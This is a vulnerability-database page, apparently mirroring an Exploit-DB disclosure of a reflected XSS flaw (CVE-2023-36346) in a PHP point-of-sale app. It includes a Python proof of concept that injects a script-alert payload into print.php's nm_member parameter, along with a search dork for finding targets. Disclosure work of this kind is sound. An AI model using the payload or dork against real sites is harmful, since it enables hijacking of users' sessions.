Lucene search
K

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

🗓️ 03 Jul 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 185 Views

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) in print.ph

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Sales of Cashier Goods v1.0 - Cross Site Scripting Exploit
4 Jul 202300:00
zdt
ATTACKERKB
CVE-2023-36346
23 Jun 202320:15
attackerkb
CNNVD
POS Codekop 跨站脚本漏洞
23 Jun 202300:00
cnnvd
CVE
CVE-2023-36346
23 Jun 202300:00
cve
Cvelist
CVE-2023-36346
23 Jun 202300:00
cvelist
EUVD
EUVD-2023-40314
23 Jun 202300:00
euvd
Nuclei
POS Codekop v2.0 - Cross Site Scripting
3 Jun 202606:04
nuclei
NVD
CVE-2023-36346
23 Jun 202320:15
nvd
Packet Storm
Sales Of Cashier Goods 1.0 Cross Site Scripting
3 Jul 202300:00
packetstorm
Prion
Cross site scripting
23 Jun 202320:15
prion
Rows per page
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests
import urllib.parse

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)

# Build the request parameters
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation